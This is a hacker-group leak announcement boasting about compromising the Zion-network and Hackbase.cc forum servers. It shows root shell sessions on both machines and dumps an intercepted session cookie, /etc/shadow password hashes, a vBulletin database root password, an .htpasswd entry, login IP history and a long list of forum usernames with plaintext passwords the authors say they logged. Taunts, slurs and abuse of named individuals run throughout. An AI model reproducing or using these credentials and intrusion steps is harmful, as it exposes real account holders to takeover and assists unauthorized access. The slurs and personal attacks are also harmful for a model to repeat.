administrator  announces  the  following  after  they   applied   some
innovations to the community.
 ____________________________________________________________________ 
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
| LUCIFER: Bereiche wie Security & Hacking sowie Coding wurden dabei |
|          besonders berücksichtigt, damit Fraud nicht mehr          |
|          dominiert, sondern sich mit NonFraud ungefähr die Waage   |
|          hält.                                                     |
|                                                                    |
|____________________________________________________________________|

LUCIFER alleges that they particularly  considered  security,  hacking
and coding categories  while  redesigning  the  messageboard  so  that
there'd be a balanced ratio of fraud and non fraud on the forums. That
is some heavily retarded noble endeavor of trying to bring  fraud  and
HACKING on the same level. We diagnose Down's syndrome or  some  other
mental disability as he clearly fails to acknowledge that there is not
even the slightest connection between fraud and hacking.
 ____________________________________________________________________ 
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
| LUCIFER: Die Hacker-Szene wird immer falsch dargestellt, das ist   |
|          nichts neues. Gesteigerte Gefahr für Zion sehe ich        |
|          dadurch nicht, wir sind sowieso schon das groesste        |
|          deutschsprachige Szene-Board und haben allein deswegen    |
|          schon seit geraumer Zeit juristische Aufmerksamkeit.      |
|                                                                    |
|____________________________________________________________________|

We are really asking ourselves what this guy understands by  the  term
"Hacking-Scene". It's time to teach them a lesson  in  order  to  make
them see  their  own  "Hacking-Scene"  shatter  to  thousand  stinking
pieces. Since the rest  of  the  team  also  shows  a  great  deal  of
stupidity, that it is not even possible to show a  minimal  amount  of
mercy. We do not want to waste time discussing that here,  you  better
have a look at their database backups.

Oh by the way, we heard that some  of you guys are interested  in  our
ninja techniques of breaking in without being  noticed.  So  today  we
will give you a 0day tutorial about how  to  hax  a  server  behind  a
reverse http proxy (means you need access to the proxy):

# nc -vl 80

Now wait....

GET /board/showthread.php?t=37267 HTTP/1.1
Host: zion-network.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://zion-network.net/board/forum.php
Cookie: bb_lastvisit=1313843209; bb_lastactivity=0; bb_userid=758; bb_password=cbb1acdccd3eefbe2f3adcf4242aa561; vbulletin_collapse=c_thanks_post194596%0Ac_thanks_post196652%0Ac_thanks_post199529; IDstack=lSuObiA%3D; bb_sessionhash=39f517118ecb0ba168105281205e0a59; bb_np_notices_displayed=6; bb_thread_lastview=751d55ed819e2ad0067fbca46f48afd1ccdfededa-16-%7Bi-35252_i-1317570965_i-34784_i-1317564637_i-37212_i-1317563932_i-37236_i-1317563385_i-37200_i-1317559780_i-37227_i-1317557248_i-37177_i-1317549825_i-37217_i-1317548469_i-37211_i-1317546730_i-37180_i-1317537132_i-37184_i-1317517400_i-36756_i-1317514332_i-35132_i-1317466004_i-37190_i-1317511102_i-36548_i-1317463629_i-36054_i-1317581261_%7D; sitechrx=a5f531169bad3dcf2c7789c566346005

^C
#

DONE! Of course we don't need to rely on such methods,  we  simply  do
something like this:

     |\          .(' *) ' ....................
     | \        ' .*) .'* $ ./getroot zion-network.net
     |(*\      .*(// .*) .# id ......................
     |___\       // (. '*.# uid=0(root)...
     ((("'\     // '  * ..........
     ((c'7')   /\)  ,. . ., 
     ((((^))  /  \   ,. ,,
   .-')))(((-'   /     ,
      (((()) __/'
       )))( |
        (()
         ))

It's black magic ... can you smell the fume? ...

# uname -a
Linux u204 2.6.32-5-amd64 #1 SMP Sun Sep 25 16:21:44 UTC 2011 x86_64 GNU/Linux

# cat /etc/issue
Debian GNU/Linux 6.0 \n \l

# id
uid=0(root) gid=0(root) groups=0(root)

# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
ntp:x:105:107::/home/ntp:/bin/false
messagebus:x:106:108::/var/run/dbus:/bin/false
dfg435345fgu03:x:1001:1001:,,,:/home/dfg435345fgu03:/bin/bash

# cat /etc/shadow
root:$6$k1ECC7.L$tYZOWc8NqRaq/RGds7SIVu3IYI/oxd5IVvS1cYlR7S/kK0CrtC1o7howFMQS5gNe3FyPkXLZVA9yiyKy7LRV51:15248:0:99999:7:::
daemon:*:15248:0:99999:7:::
bin:*:15248:0:99999:7:::
sys:*:15248:0:99999:7:::
sync:*:15248:0:99999:7:::
games:*:15248:0:99999:7:::
man:*:15248:0:99999:7:::
lp:*:15248:0:99999:7:::
mail:*:15248:0:99999:7:::
news:*:15248:0:99999:7:::
uucp:*:15248:0:99999:7:::
proxy:*:15248:0:99999:7:::
www-data:*:15248:0:99999:7:::
backup:*:15248:0:99999:7:::
list:*:15248:0:99999:7:::
irc:*:15248:0:99999:7:::
gnats:*:15248:0:99999:7:::
nobody:*:15248:0:99999:7:::
libuuid:!:15248:0:99999:7:::
Debian-exim:!:15248:0:99999:7:::
statd:*:15248:0:99999:7:::
sshd:*:15248:0:99999:7:::
user:$6$/0FK/.iX$k9qkCt7AzvwIYu1yN/ofroZCzmivenSDgPzTFnPY36XeAqcF4a6vUyFSbCMAHqz61L5roXdK1nWBn.wcE89U5/:15248:0:99999:7:::
mysql:!:15248:0:99999:7:::
ntp:*:15248:0:99999:7:::
messagebus:*:15248:0:99999:7:::
dfg435345fgu03:$6$vMjSRgiC$iY1hSMMP3mHyCqRyEGtqfqTuDFyPwtdVvn/0zZXsu8B2mJMwAURxmZjtkF9xgmSO02alaVBlme.NrW1gTS5cl1:15248:0:99999:7:::

# last
root     pts/0        host-static-93-1 Thu Oct 13 03:48    gone - no logout 
root     pts/0        178.122.33.104   Wed Oct 12 03:58 - 03:48  (23:50)    
root     pts/0        83.246.185.93    Tue Oct  4 22:47 - 03:58 (7+05:11)   
root     pts/0        83.246.185.93    Tue Oct  4 22:46 - 22:47  (00:01)    
root     pts/0        83.246.185.93    Tue Oct  4 22:44 - 22:46  (00:01)    
root     pts/0        83.246.185.93    Tue Oct  4 22:43 - 22:44  (00:00)    
root     pts/0        83.246.185.93    Tue Oct  4 22:38 - 22:43  (00:04)    
root     pts/0        83.246.185.93    Tue Oct  4 22:37 - 22:38  (00:01)    
root     pts/0        85.121.52.21     Tue Oct  4 22:20 - 22:37  (00:16)    
root     pts/0        178.124.12.137   Tue Oct  4 22:14 - 22:20  (00:06)    
root     pts/0        188.24.19.198    Tue Oct  4 20:19 - 22:14  (01:55)    
root     pts/0        188.24.19.198    Tue Oct  4 20:16 - 20:19  (00:02)    
root     pts/1        80.242.104.93    Sun Oct  2 17:55    gone - no logout 
root     pts/1        80.242.104.93    Sun Oct  2 17:43 - 17:55  (00:11)    
root     pts/3        79.112.62.66     Sun Oct  2 16:11    gone - no logout 
root     pts/0        80.242.104.93    Sun Oct  2 14:50 - 20:16 (2+05:25) 

# alias ls="ls -la"

# ls
total 64
drwx------  3 root root  4096 Oct  2 14:12 .
drwxr-xr-x 22 root root  4096 Oct  1 09:23 ..
drwx------  2 root root  4096 Oct  1 09:23 .aptitude
-rw-r--r--  1 root root   570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root   140 Nov 19  2007 .profile
-rwxrwxrwx  1 root root 41394 Oct  1 17:16 mysqltuner.pl

# cd /home

# ls
total 16
drwxr-xr-x  4 root           root           4096 Oct  1 18:32 .
drwxr-xr-x 22 root           root           4096 Oct  1 09:23 ..
drwxr-xr-x  2 dfg435345fgu03 dfg435345fgu03 4096 Oct  2 14:20 dfg435345fgu03
drwxr-xr-x  2 user           user           4096 Oct  1 09:24 user

# cd dfg435345fgu03

# ls  
total 20
drwxr-xr-x 2 dfg435345fgu03 dfg435345fgu03 4096 Oct  2 14:20 .
drwxr-xr-x 4 root           root           4096 Oct  1 18:32 ..
-rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03  220 Oct  1 18:32 .bash_logout
-rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03 3184 Oct  1 18:32 .bashrc
-rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03  675 Oct  1 18:32 .profile

# cd ..

# cd user

# ls
total 20
drwxr-xr-x 2 user user 4096 Oct  1 09:24 .
drwxr-xr-x 4 root root 4096 Oct  1 18:32 ..
-rw-r--r-- 1 user user  220 Oct  1 09:24 .bash_logout
-rw-r--r-- 1 user user 3184 Oct  1 09:24 .bashrc
-rw-r--r-- 1 user user  675 Oct  1 09:24 .profile

# Nothing to see here :(^C

# cd /var/www

# ls
total 20
drwxr-xr-x  3 www-data www-data 4096 Oct  1 18:49 .
drwxr-xr-x 16 root     root     4096 Oct  2 14:37 ..
drwxr-xr-x 17 root     root     4096 Oct  2 14:25 board
-rw-r--r--  1 root     root      111 Oct  2 05:54 index.php
-rw-r--r--  1 root     root     1200 Oct  2 04:29 robots.txt

# cd board

# ls -la
total 2604
drwxr-xr-x 17 root     root       4096 Oct  2 14:25 .
drwxr-xr-x  3 www-data www-data   4096 Oct  1 18:49 ..
-rw-r--r--  1 root     root      12292 May 17  2010 .DS_Store
-rw-r--r--  1 root     root         70 May 17  2010 ._.DS_Store
-rw-r--r--  1 root     root      19541 Sep 24 11:16 LICENSE
-rw-r--r--  1 root     root      44905 Sep 24 11:16 ajax.php
-rw-r--r--  1 root     root      75977 Sep 24 11:16 album.php
-rw-r--r--  1 root     root      19375 Sep 24 11:16 announcement.php
-rw-r--r--  1 root     root       4269 Sep 24 11:16 api.php
-rw-r--r--  1 root     root       3862 Sep 24 11:16 apichain.php
drwxr-xr-x  2 root     root       4096 Oct  1 15:06 archive
-rw-r--r--  1 root     root       8745 Sep 24 11:16 asset.php
-rw-r--r--  1 root     root      20438 Sep 24 11:16 assetmanage.php
-rw-r--r--  1 root     root      15831 Sep 24 11:16 attachment.php
-rw-r--r--  1 root     root       6690 Sep 24 11:16 attachment_inlinemod.php
-rw-r--r--  1 root     root       1960 Sep 25 10:03 banlist.php
-rw-r--r--  1 root     root       3657 Sep 24 11:16 blog_attachment.php
-rw-r--r--  1 root     root      96572 Sep 24 11:16 calendar.php
-rw-r--r--  1 root     root       3336 Sep 24 11:16 ckeditor.php
-rw-r--r--  1 root     root         43 Sep 24 11:16 clear.gif
drwxr-xr-x 11 root     root       4096 Oct  1 15:09 clientscript
-rw-r--r--  1 root     root      15382 Sep 24 11:16 converse.php
drwxr-xr-x  7 root     root       4096 Oct  1 15:09 cpstyles
-rw-r--r--  1 root     root       3263 Sep 24 11:16 cron.php
-rw-r--r--  1 root     root       6206 Sep 24 11:16 css.php
drwxrwxrwx  3 root     root      36864 Oct  2 10:09 customavatars
drwxr-xr-x  3 root     root       4096 Oct  1 15:09 customgroupicons
drwxrwxrwx  2 root     root      20480 Oct  2 07:58 customprofilepics
-rw-r--r--  1 root     root       1739 Sep 24 11:16 editor.php
-rw-r--r--  1 root     root      47262 Sep 24 11:16 editpost.php
-rw-r--r--  1 root     root       1355 Sep 24 11:16 entry.php
-rw-r--r--  1 root     root      30313 Sep 24 11:16 external.php
-rw-r--r--  1 root     root       9920 Sep 24 11:16 faq.php
-rw-r--r--  1 root     root      10134 Sep 24 11:16 favicon.ico
-rw-r--r--  1 root     root      22480 Sep 24 11:16 forum.php
-rw-r--r--  1 root     root      43139 Sep 24 11:16 forumdisplay.php
-rw-r--r--  1 root     root       2025 Sep 24 11:16 global.php
-rw-r--r--  1 root     root     152626 Sep 24 11:16 group.php
-rw-r--r--  1 root     root      26181 Sep 24 11:16 group_inlinemod.php
-rw-r--r--  1 root     root      11362 Sep 24 11:16 groupsubscription.php
-rw-r--r--  1 root     root       9016 Sep 24 11:16 image.php
drwxr-xr-x 26 root     root       4096 Oct  1 15:10 images
drwxr-xr-x  9 root     root      12288 Oct  1 19:34 includes
-rw-r--r--  1 root     root        114 Oct  2 05:57 index.php
-rw-r--r--  1 root     root      47257 Sep 24 11:16 infraction.php
-rw-r--r--  1 root     root     187319 Sep 24 11:17 inlinemod.php
-rw-r--r--  1 root     root       6831 May 14 02:43 itrader.php
-rw-r--r--  1 root     root      15395 Aug 25 15:30 itrader_detail.php
-rw-r--r--  1 root     root      12933 Aug 25 14:14 itrader_feedback.php
-rw-r--r--  1 root     root       1405 Apr 21 03:45 itrader_global.php
-rw-r--r--  1 root     root      23116 Aug 25 17:15 itrader_main.php
-rw-r--r--  1 root     root       3970 Apr 21 03:45 itrader_report.php
-rw-r--r--  1 root     root       1779 Aug  6 06:47 jabber.php
-rw-r--r--  1 root     root      11697 Sep 24 11:16 joinrequests.php
-rw-r--r--  1 root     root       1675 Sep 24 11:17 list.php
-rw-r--r--  1 root     root      11055 Sep 24 11:17 login.php
-rw-r--r--  1 root     root      30872 Sep 24 11:17 member.php
-rw-r--r--  1 root     root      16346 Sep 24 11:17 member_inlinemod.php
-rw-r--r--  1 root     root      40089 Sep 24 11:17 memberlist.php
drwxr-xr-x  6 root     root       4096 Oct  1 15:10 mgc_cb_evo
-rw-r--r--  1 root     root      60012 May 17  2010 mgc_cb_evo.php
-rw-r--r--  1 root     root      49969 Sep 25 13:43 mgc_cb_evo_ajax.php
-rw-r--r--  1 root     root      22218 Sep 24 11:17 misc.php
-rw-r--r--  1 root     root       5866 Sep 24 11:17 mobile.php
-rw-r--r--  1 root     root      76344 Sep 24 11:17 moderation.php
-rw-r--r--  1 root     root       6733 Sep 24 11:17 moderator.php
-rw-r--r--  1 root     root      17516 Sep 24 11:17 newattachment.php
-rw-r--r--  1 root     root      41424 Sep 24 11:17 newreply.php
-rw-r--r--  1 root     root      20622 Sep 24 11:17 newthread.php
-rw-r--r--  1 root     root      21562 Sep 24 11:17 online.php
drwxr-xr-x  7 root     root       4096 Oct  1 15:10 packages
-rw-r--r--  1 root     root       8526 Sep 24 11:17 payment_gateway.php
-rw-r--r--  1 root     root      13314 Sep 24 11:17 payments.php
-rw-r--r--  1 root     root       4016 Sep 24 11:17 picture.php
-rw-r--r--  1 root     root      16619 Sep 24 11:17 picture_inlinemod.php
-rw-r--r--  1 root     root      26550 Sep 24 11:17 picturecomment.php
-rw-r--r--  1 root     root      29311 Sep 24 11:17 poll.php
-rw-r--r--  1 root     root      10318 Sep 24 11:17 posthistory.php
-rw-r--r--  1 root     root      76497 Sep 24 11:17 postings.php
-rw-r--r--  1 root     root       7037 Sep 24 11:17 printthread.php
-rw-r--r--  1 root     root      81357 Sep 24 11:17 private.php
-rw-r--r--  1 root     root     163788 Sep 24 11:17 profile.php
-rw-r--r--  1 root     root      56552 Sep 24 11:17 register.php
-rw-r--r--  1 root     root       7248 Sep 24 11:17 report.php
-rw-r--r--  1 root     root      14719 Sep 24 11:17 reputation.php
-rw-r--r--  1 root     root        127 Sep 26 02:58 rules.php
-rw-r--r--  1 root     root      35091 Sep 24 11:17 search.php
-rw-r--r--  1 root     root      22872 Sep 24 11:17 sendmessage.php
-rw-r--r--  1 root     root      12879 Sep 24 11:17 showgroups.php
-rw-r--r--  1 root     root      12806 Sep 24 11:17 showpost.php
-rw-r--r--  1 root     root      82207 Sep 24 11:17 showthread.php
drwxrwxrwx  2 root     root       4096 Oct  1 17:57 signaturepics
drwxr-xr-x  2 root     root       4096 Oct  1 15:10 store_sitemap
-rw-r--r--  1 root     root      39241 Sep 24 11:17 subscription.php
-rw-r--r--  1 root     root       5353 Sep 24 11:17 tags.php
-rw-r--r--  1 root     root       8754 Sep 24 11:17 threadrate.php
-rw-r--r--  1 root     root      11104 Sep 24 11:17 threadtag.php
-rw-r--r--  1 root     root         61 Sep 24 11:17 uploadprogress.gif
-rw-r--r--  1 root     root      39671 Sep 24 11:17 usercp.php
-rw-r--r--  1 root     root      21703 Sep 24 11:17 usernote.php
drwxr-xr-x 13 root     root       4096 Oct  1 15:10 vb
-rw-r--r--  1 root     root      28505 Sep 24 11:17 visitormessage.php
-rw-r--r--  1 root     root        126 Jul 10 18:23 vv.php
-rw-r--r--  1 root     root       1679 Sep 24 11:17 widget.php
-rw-r--r--  1 root     root       3801 Sep 24 11:17 xmlsitemap.php
drwxr-xr-x  3 root     root       4096 Oct  1 15:06 xxxoinbe843bSIUf4igfn49ugnsdkmngwei9fu
drwxr-xr-x  2 root     root       4096 Oct  1 15:10 zzzsf84bfsadifubSIDFUB48bf

# head -n75 includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 4
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ?2000-2011 vBulletin Solutions Inc. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

/*-------------------------------------------------------*\
| ****** HINWEIS ZU DEN VARIABLEN IN DIESER DATEI ******* |
+---------------------------------------------------------+
| Falls bei dem Verbindungsaufbau zu Ihrer MySQL-Daten-   |
| bank Fehler auftreten, muessen Sie Ihren Provider um    |
| Hilfe bitten, da wir Ihnen die richtigen Daten fuer die |
| Variablen in dieser Datei nicht nennen koennen.         |
\*-------------------------------------------------------*/

	//	****** DATENBANK: TYP ******
	//	Tragen Sie hier den Typ Ihres Datenbankservers ein, auf dem sich die vBulletin-Datenbank
	//	befinden wird bzw. befindet. Gueltige Optionen sind mysql und mysqli.
	//	Versuchen Sie es mit mysqli, wenn Sie PHP 5 und MySQL 4.1+ verwenden.
	//	Wenn Sie eine Master-Slave Datenbankkonfiguration betreiben moechten, tragen Sie 'mysql_slave' bzw. 'mysqli_slave' ein.
$config['Database']['dbtype'] = 'mysql';

	//	****** DATENBANK: NAME DER DATENBANK ******
	//	Tragen Sie hier den Namen der Datenbank ein, mit der vBulletin arbeiten soll.
	//	Diesen Datenbanknamen erhalten Sie normalerweise von Ihrem Provider.
$config['Database']['dbname'] = 'gh45t456dff';

	//	****** TABELLEN-PRAEFIX ******
	//	Praefix, das den Tabellennamen in der Datenbank vorangestellt wird.
	//	Zum Beispiel: $config['Database']['tableprefix'] = 'vb_';
	//	Hinweis: Praefixe fuer die Tabellennamen koennen Sie mit der Datei
	//	install/tableprefix.php hinzufuegen, aendern oder entfernen.
$config['Database']['tableprefix'] = '';

	//	****** TECHNISCHE E-MAIL-ADRESSE ******
	//	Treten Fehler bei der Datenbank auf, wird eine E-Mail mit einer Fehlerbeschreibung
	//	an diese Adresse geschickt.
	//	Falls Sie hier keine E-Mail-Adresse eintragen, werden bei Datenbankfehlern keine
	//	E-Mails verschickt.
$config['Database']['technicalemail'] = 'techmin@zion-network.net';

	//	****** LEEREN SQL-MODUS ERZWINGEN ******
	//	In neueren Versionen von MySQL (4.1+) gibt es einige Neuerungen, die nicht mit vBulletin
	//	kompatibel sind. Wenn Sie diese Einstellung auf "true" setzen, werden diese Neuerungen
	//	deaktiviert. Sie muessen diese Einstellung nur aendern, wenn vBulletin Sie dazu auffordert.
$config['Database']['force_sql_mode'] = false;



	//	****** MASTER-DATENBANK: SERVERNAME UND PORT ******
	//	Tragen Sie hier den Hostnamen oder die IP-Adresse und den Port Ihres Datenbankservers ein.
	//	Wenn Sie sich nicht sicher sind, was Sie hier eintragen muessen, versuchen Sie es zunaechst
	//	mit dem Standardwerten.
	//
	//	Hinweis: Wenn Sie IIS 7+ verwenden und MySQL auf demselben Server installiert ist,
	//	muessen Sie '127.0.0.1' statt 'localhost' verwenden.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;

	//	****** MASTER-DATENBANK: BENUTZERNAME & KENNWORT ******
	//	Tragen Sie hier den Benutzernamen und das Kennwort ein, die Sie fuer den Zugriff
	//	auf den MySQL-Server benoetigen.
	//	Den Benutzernamen und das Kennwort erhalten Sie von Ihrem Provider.
$config['MasterServer']['username'] = 'root';
$config['MasterServer']['password'] = 'MN1TkdPXEjsghK5Rpn6BOhgihwEGdfFFXR9aM9Mz';

	//	****** MASTER-DATENBANK: PERSISTENTE VERBINDUNGEN ******
	//	Hier koennen Sie festlegen, ob persistente Verbindungen zu MySQL genutzt werden sollen.
	//	Der Performance-Unterschied ist im Normalfall vernachlaessigbar, ausser vielleicht

# ALRIGHT WE LET MYSQL RUN AS ROOT GOODJOB TECHADMIN^C

# find . -name ".ht*" 
./clientscript/ckeditor/.htaccess
./includes/.htaccess
./includes/.htpasswd

# cat ./includes/.htaccess
AuthUserFile /var/www/board/includes/.htpasswd
AuthGroupFile /dev/null
AuthName "Password Protected Area"
AuthType Basic

# YES WE HAVE TO PROTECT THE include/ DIR BUT NOT THE ADMIN DIR !^C
# HOW RETARDED IS THAT?^C

# cat ./includes/.htpasswd
gfhfghgfhfh:gfQWbanquzu7U

# ...^C

Ok, we decided to build in some logging of plaintext passwords, so you
find a pretty nice list of the (important)  users  we  got.  The  list
includes admins, mods, supermods, vendors, VIPs and 2nd  level  users.
That should offer pretty good ruquz.

$yMBI0S:!"§$symbioszion2
0nlybuziness:q53shlmj-zupf-gtxq
0th3rw1s3:sackgesicht1
2x4:4.gSi3a0GHSig,$g,$9S1$;zx,4§$Yzllm§$9S1$;za0GHSig,$g,$9S1$x,4§$Yzllm§$3a0
3gold:hHz74JJddd24
6bfbpgan:crackn1994
A. Scott:bljadskipetra1963dirk1969
Absuro:Jen9gIrf2aAq
Born2Hack:hurensohn123.
BozzPL:fajnadziwka77
Captain:affe1234
CerzZ:●●●●●●●●●●
Clive:qwertz1234
CurRy:Razyboarda3b9*
Cyber Tjak:)kn{qhaÜxkT:y*fx,C{+o@npwnGwC0j
Death:²²³;KW282jlad"§'2]249"!2
Domenic:znDomenic1337cpp
Dynamit12:q1w2e3r4
Fairtrade-Hooker:bTBfkCWVjGVrqm
Fat Joe:Dubastard!12
FerrisBueller62:bueller4321
Fl00der:ẵṷezhsfdf35e$§56$367dgdrgerz453635e$§56$gergdrg3r3
Fleischpeitsche:5Gg4Bk2kfZsUt7svQQndEVS8meAfzWgbuXReJYG7H
Gibbsi:Gibbsi17
Goa:N/(//$§??="(/$nhbfafvaosh**##jniun
HUGO:809583
Hades:hi1337
IcEmAnN:Allerdings123
IceWolfBiH:kreker2011++
Johnny:gaylordhoho
Kaho:lol1223
KiR0V:blizzart-1
Knell:novn7L8n
Kollegah der Boss:monamona
LaV!daL0ca:öpIqw;CVi,#u7#eSvF3
Lyrex:Q8vK1c16bqIt1hL5z0
Marlboro:Hammer123
Morris:Wmq4HDAn
NYD:SaskiaJahnke
Niemann:smokingteddy12
Overlord:sxyLW6WJ
P1r0x:Rofl123@
Paco:13xqextraordinary37
Platinum:c3pzhadf
Pro100DDOS:3006497852
Pro100ddos:3006497852
R3volution:beste
Rubik:getlow123
S!mspon:123abc456
Schlomo:nQLrgeLlzKU6vy_bREO5
Shroomery:82#~wmV9u-IQAdn{
Sirius.GER:rolexblingbling@2
Snowstar:8Nj6aAh5
Spike80:$$$ksmafia$$$
Spike:mareike
TEAR:fusion22#
ThunBird:gentlemangentleman
Tiberius:asdoiasjdOWK
Timmee:Ria05!Ria05
Titanium:1274HappyNinja
Vadim:eg54egh45h
Werner:ggrhaskell221abx55
ZeuS:h4x0r3000
abo:nero2311
affenarsch:123456ab
ahabye:w11h1995
alpha:bobby27
bahnticketz:LJKSfß04j_LSdjfl
bigpapa1:fickdich123
blackafgahn:jojo123
blackwater:aSd1111111111""
blond1000:sackgesicht1
bloody:4ns8ka0vzion
carloŽs:carlos11
chakuza:nemismortom88
comic:Weltraum?tele
congo:)"/HMJZ"BD62tfgbdNZ"
d1xxy:hd]]'']"}:}(}"4A
d3adline:hum!0hm
d3rd0n:vet31mh
dendenis:Waslosdicker2
dirtydevil:Z/&"L1ght)0d.;!=)Ficken13"(/..<>
elax:jessica
emdre:lunartec1
fair_playa77:J6Dm8hFhJ6Dm8hFh
fakedMe:eileen13
fakerboy:frankycrew12345
fallout:wazzzappsp3
flon203:flon@Nex
glow:amolacar1994+#!Asdf
hades:hi1337
hakan123:hakan
heisenb6rg:3e2w1q
homouus:lolfisch
homouus:lolfische
iks:noji987
jannizzz:lol123
johnlopez:948nF)§(J03kd09j3
kaye:kaye1234
knell:novn7L8n
krillewurm:manfred2711
krono§:1337return1337
kryptôn:123456789ss
lasdas:123456
leonard:wj0oU3QJr7pgZ
lolboter:lila123
lowbird:3mksu92k=DAK"=)213s
lucifer:3.fv!G,$7Ft/;zx,5§Y$Gh"f4tv!D§$3a%0Gy(hXH
misanthrop:vju4S4KSthdUD
miss.marpel:m4NnrxfZ6QbbyhZc
mividaloca:jmZ5rjSkjl#7Qm23+::SmqW.cY}U8c
mr. CC:Ficken1337
mr.montana:46samira46
muti:fuckthatshitinass22
n1312:JKjd(()&%hf%&g837gdf
neocrow:6/4=)6$§61%)6/=1/
nighter:Six6Pack
ooops:ichkommauskielderstadtammeer241985
paco:13xqextraordinary37
paulpanzer:159159159
pelikan:B3v8aZPS
phen:utecpnkq6512429myaccount!
prosto:16471647
ps24h:Q!ä?-sK2%8AcfÜ2.=%
purplera1n:rg5hg54gh45hg
r4nd0m:fuckyou1
rabbit:nSRXQm3G
rad0n:12345
reQ:Mesum3565me35650108e711lol
romulus:v678rheberhbeg
sani:19n4schk4tz385
sips:5hgedhtbdh
slic3menic3:DkWLjh8G
snoppy0066:pueppyi1AA
sqli~hoe:ArZt1994
st3aLth:1337!Aa
td4s:1qaz2wsx
th3p0is0n:th3p0is0nrules1337
till7:peter123
tivja:fabuge28
trixx:makemoney!
unnex:selfmode3
vendor84453:15zocker15
veryanonym:wasnhierlosman1991
vittula:oddset06
wacked2:klfGKDfksdmfoc5§io
wastl:wastl24
xK1NG:xhu12101995xier
xTonyStylesx:pol1pol2
z4pz4r4p:AzzarackAttack
zionnoob:123456

                                                         ,;~;,        
                                                        _/\           
                                                        \  )          
                                                (\\      ())          
                                                /';;,,  // |          
-------========{  Hackbase.cc  }========))))))))))))))=m(  )_ __      
                                               | ,(.' '~/()' '  '\    
We can't say much here  because we  would start ~  |     ||(      );, 
repeating  ourselves.  But anyway, on Hackbase.cc  (   ,;.)-\    / ';,
the banner  says "Hacking,  Carding & more". Don't  \ (       \ (     
ask  why  we owned  them;   the community and that   ||         \\    
banner  begged for it.  By  now you  know our moti- /_(         /_(   
vation, you know our goals, deal with it.
But there is something else which was a thorn in our  side.  It  seems
that Easy Laster aka ea former admin  of  Free-Hack  (after  we  owned
them),  hosts  his   4004-Security-Project   on   Hackbase's   server.
4004-security-project.com was a blog on  that  Easy  constantly  posts
horribly lame exploits for all kind of webapps that nobody uses  while
thinking that by publishing  all  this  bullshit  he'd  actually  help
people. Actually it's a known fact that he sucks all kinds of cock for
vulnerabilities  to  put   on   exploit-db,   just   check   it   out:
exploit-db.com/author/?a=2201. It's hilarious and  more  than  obvious
that he is one of those kids  that  try  to  inject  a  '  into  every
parameter on a website. Here is what you get.


# uname -a
FreeBSD FreeBSD 8.2-RELEASE-p3 #0: Fri Sep 30 16:23:24 MSD 2011 amd64

# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

# cat /etc/passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
